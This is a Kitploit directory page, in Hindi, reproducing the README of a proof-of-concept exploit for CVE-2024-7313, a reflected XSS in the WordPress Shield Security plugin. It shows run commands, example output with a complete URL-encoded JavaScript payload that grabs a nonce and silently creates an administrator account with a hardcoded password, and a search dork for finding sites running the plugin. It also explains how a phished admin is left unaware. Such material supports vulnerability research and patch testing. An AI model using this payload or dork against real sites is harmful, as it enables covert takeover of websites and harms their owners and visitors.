Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-7313 — Custom Proof-of-Concept: XSS पर अनधिकृत Admin Account Creation के लिए, WordPress Plugin Shield Security < 20.0.6 के माध्यम से | Kitploit
उपकरण/GitHubGitHub/wayne-ker/cve-2024-7313
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubwayne-ker/cve-2024-7313

CVE-2024-7313

Custom Proof-of-Concept: XSS पर अनधिकृत Admin Account Creation के लिए, WordPress Plugin Shield Security < 20.0.6 के माध्यम से

रिपॉजिटरी देखें
312 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

शील्ड सुरक्षा प्लगइन भेद्यता शोषण (CVE-2024-7313)

Kali Linux Works on My Machine Sleep Deprivation

अवलोकन

इस रिपॉजिटरी में एक Python PoC स्क्रिप्ट है जो WordPress के लिए Shield Security Plugin में एक reflected XSS भेद्यता का शोषण करने के लिए डिज़ाइन की गई है, जो संस्करण 20.0.6 से नीचे के संस्करणों को प्रभावित करती है। यह भेद्यता (CVE-2024-7313) एक हमलावर को लक्ष्य के लिए अनुकूलित एक दुर्भावनापूर्ण लिंक बनाने की अनुमति देती है, जब कोई व्यवस्थापक उस पर क्लिक करता है, तो शोषण XSS के माध्यम से एक अनधिकृत व्यवस्थापक खाता बनाएगा। स्क्रिप्ट स्वचालित रूप से कमजोर इंस्टॉलेशन का पता लगाती है और भेद्यता का शोषण करने के लिए एक पेलोड उत्पन्न करती है।

भेद्यता जानकारी

  • CVE: CVE-2024-7313
  • प्लगइन: Shield Security < 20.0.6
  • गंभीरता: उच्च
  • प्रभावित सिस्टम: WordPress वेबसाइटें जो Shield Security प्लगइन संस्करण < 20.0.6 का उपयोग कर रही हैं
  • हमले का प्रकार: रिफ्लेक्टेड क्रॉस-साइट स्क्रिप्टिंग (XSS)
  • प्रकाशन तिथि: 7 अगस्त, 2024
  • OWASP TOP-10: A7: क्रॉस-साइट स्क्रिप्टिंग (XSS)

उपयोग

आवश्यक शर्तें

  • Python 3.x
  • requests और beautifulsoup4 लाइब्रेरीज़

आवश्यक लाइब्रेरीज़ को इस प्रकार इंस्टॉल करें:

root@kitploit:~
pip install requests beautifulsoup4

स्क्रिप्ट चलाना

  1. रिपॉजिटरी को क्लोन करें:
root@kitploit:~
git clone https://github.com/Wayne-Ker/CVE-2024-7313.git
cd CVE-2024-7313
  1. लक्ष्य URL के साथ स्क्रिप्ट चलाएं:
root@kitploit:~
python3 exploit.py <target_url>

उदाहरण:

root@kitploit:~
python3 exploit.py http://127.0.0.1

नए व्यवस्थापक उपयोगकर्ता (उपयोगकर्ता नाम, ईमेल, प्रथम नाम, अंतिम नाम) के लिए आवश्यक विवरण दर्ज करने के बाद, स्क्रिप्ट एक पेलोड URL उत्पन्न करेगी। आप इस URL को अपने ब्राउज़र में पेस्ट करके रिफ्लेक्टेड XSS हमले को निष्पादित कर सकते हैं, जो WordPress साइट में एक नया व्यवस्थापक उपयोगकर्ता बनाएगा।

  1. उदाहरण आउटपुट:
root@kitploit:~
#############################################################################
#                                                                           #
#                                                                           #
#   ______     _______     ____   ___ ____  _  _       _____ _____ _ _____  #
#  / ___\ \   / | ____|   |___ \ / _ |___ \| || |     |___  |___ // |___ /  #
# | |    \ \ / /|  _| _____ __) | | | |__) | || |_ _____ / /  |_ \| | |_ \  #
# | |___  \ V / | |__|_____/ __/| |_| / __/|__   _|_____/ /  ___) | |___) | #
#  \____|  \_/  |_____|   |_____|\___|_____|  |_|      /_/  |____/|_|____/  #
#                                                                           #
#    Shield Security Plugin Vulnerability (CVE-2024-7313)                   #
#    Reflected XSS in WordPress Shield Security Plugin                      #
#    Versions Affected: < 20.0.6                                            #
#    Risk: High                                                             #
#    Developed by: Wayne-Kerr                                              #
#    Published: August 7, 2024                                              #
############################################################################# 
Shield Security version is vulnerable. Let's continue.
Enter username: fakename
Enter email: [email protected]
Enter first name: Haxor
Enter last name: test

Using hardcoded password: HaxorStrongAFPassword123!!

Generated XSS Payload URL: http://127.0.0.1/wp-admin/admin.php?page=icwp-wpsf-plugin&nav=dashboard&nav_sub=%3Cscript%3Evar%20xhrNonce%20%3D%20new%20XMLHttpRequest%28%29%3B%20xhrNonce.open%28%27GET%27%2C%20%27/wp-admin/user-new.php%27%2C%20true%29%3B%20xhrNonce.onload%20%3D%20function%28%29%20%7B%20if%20%28xhrNonce.status%20%3D%3D%3D%20200%29%20%7B%20var%20nonce%20%3D%20xhrNonce.responseText.match%28/name%3D%22_wpnonce_create-user%22%20value%3D%22%28%5Ba-zA-Z0-9%5D%2B%29%22/%29%5B1%5D%3B%20var%20xhr%20%3D%20new%20XMLHttpRequest%28%29%3B%20xhr.open%28%27POST%27%2C%20%27/wp-admin/user-new.php%27%2C%20true%29%3B%20xhr.setRequestHeader%28%27Content-Type%27%2C%20%27application/x-www-form-urlencoded%27%29%3B%20xhr.setRequestHeader%28%27Referer%27%2C%20%27http%3A//127.0.0.1/wp-admin/user-new.php%27%29%3B%20xhr.setRequestHeader%28%27Origin%27%2C%20%27http%3A//127.0.0.1%27%29%3B%20var%20params%20%3D%20%27action%3Dcreateuser%26_wpnonce_create-user%3D%27%20%2B%20nonce%20%2B%20%27%26_wp_http_referer%3D%252Fwp-admin%252Fuser-new.php%26user_login%3Dnick%26email%3Dnick%2540test.com%26first_name%3Dnick%26last_name%3Dtest%26url%3Dtest%26pass1%3DHaxorStrongAFPassword123%2521%2521%26pass2%3DHaxorStrongAFPassword123%2521%2521%26role%3Dadministrator%26createuser%3DAdd%2BNew%2BUser%27%3B%20xhr.send%28params%29%3B%20xhr.onload%20%3D%20function%28%29%20%7B%20if%20%28xhr.status%20%3D%3D%20200%29%20%7B%20console.log%28%27Admin%20user%20created%20successfully%27%29%3B%20window.location.href%20%3D%20%27http%3A//127.0.0.1/wp-admin/admin.php%3Fpage%3Dicwp-wpsf-plugin%26nav%3Ddashboard%26nav_sub%3Doverview%27%3B%20%7D%20else%20%7B%20console.log%28%27Error%20occurred%3A%20%27%20%2B%20xhr.statusText%29%3B%20%7D%20%7D%3B%20%7D%20else%20%7B%20console.log%28%27Error%20fetching%20nonce%3A%20%27%20%2B%20xhrNonce.statusText%29%3B%20%7D%20%7D%3B%20xhrNonce.send%28%29%3B%3C/script%3E

एक बार जब आप उत्पन्न XSS पेलोड URL पर जाते हैं, तो शोषण निष्पादित हो जाएगा, और लक्ष्य WordPress साइट पर एक नया व्यवस्थापक उपयोगकर्ता बनाया जाएगा।

सहायता मेनू

आप सहायता मेनू तक इस प्रकार पहुँच सकते हैं:

root@kitploit:~
python3 exploit.py -h

कमजोर साइट्स खोजने के लिए डॉर्क

कमजोर प्लगइन का उपयोग करने वाली वेबसाइटों की पहचान करने के लिए, आप निम्नलिखित डॉर्क का उपयोग कर सकते हैं:

root@kitploit:~
inurl:"/wp-content/plugins/wp-simple-firewall/"

यह आपको उन वेबसाइटों को खोजने में मदद करेगा जिनमें Shield Security प्लगइन स्थापित है। कृपया ध्यान दें कि संस्करण संख्या सार्वजनिक रूप से दिखाई नहीं देती है, इसलिए मैन्युअल परीक्षण की आवश्यकता हो सकती है।

यह कैसे काम करता है

  • स्क्रिप्ट पहले जाँचती है कि लक्ष्य WordPress इंस्टॉलेशन Shield Security प्लगइन के कमजोर संस्करण का उपयोग कर रहा है या नहीं, wp-login.php पृष्ठ से प्रतिक्रिया की जाँच करके।
  • यदि प्लगइन संस्करण कमजोर है, तो यह एक रिफ्लेक्टेड XSS पेलोड उत्पन्न करने के लिए आगे बढ़ता है, जो निष्पादित होने पर, एक हार्डकोडेड पासवर्ड के साथ एक नया व्यवस्थापक उपयोगकर्ता बनाएगा।
  • पेलोड को पहले GET अनुरोध का उपयोग करके खाता निर्माण के लिए उपयोग किए जाने वाले WordPress nonce को गतिशील रूप से खोजने के लिए बनाया गया है, फिर उस nonce का उपयोग करके स्क्रिप्ट में दिए गए नए उपयोगकर्ता के विवरण के साथ उपयोगकर्ता निर्माण एंडपॉइंट पर POST अनुरोध सबमिट किया जाता है।
  • पेलोड को फिर URL-एन्कोड किया जाता है और हमले में उपयोग के लिए प्रदर्शित किया जाता है।
  • एक बार साइट के व्यवस्थापक को भेजा गया और लिंक पर क्लिक किया गया, तो साइट पर स्क्रिप्ट द्वारा पार्स किए गए विवरण के साथ एक नया व्यवस्थापक उपयोगकर्ता बनाया जाएगा। यह सब पृष्ठभूमि में किया जाता है, जिसमें फिश किया गया व्यवस्थापक Shield Security डैशबोर्ड पर रीडायरेक्ट होता है और पृष्ठभूमि में शोषण का कोई पता नहीं चलता।

अस्वीकरण

यह उपकरण केवल शैक्षिक उद्देश्यों के लिए है और इसका उपयोग केवल अधिकृत पेनिट्रेशन टेस्टिंग वातावरण में किया जाना चाहिए। उन सिस्टमों तक अनधिकृत पहुँच या उपयोग जिनके आप मालिक नहीं हैं, अवैध है। लेखक इस उपकरण के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है।

लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है।

टूल डाउनलोड करें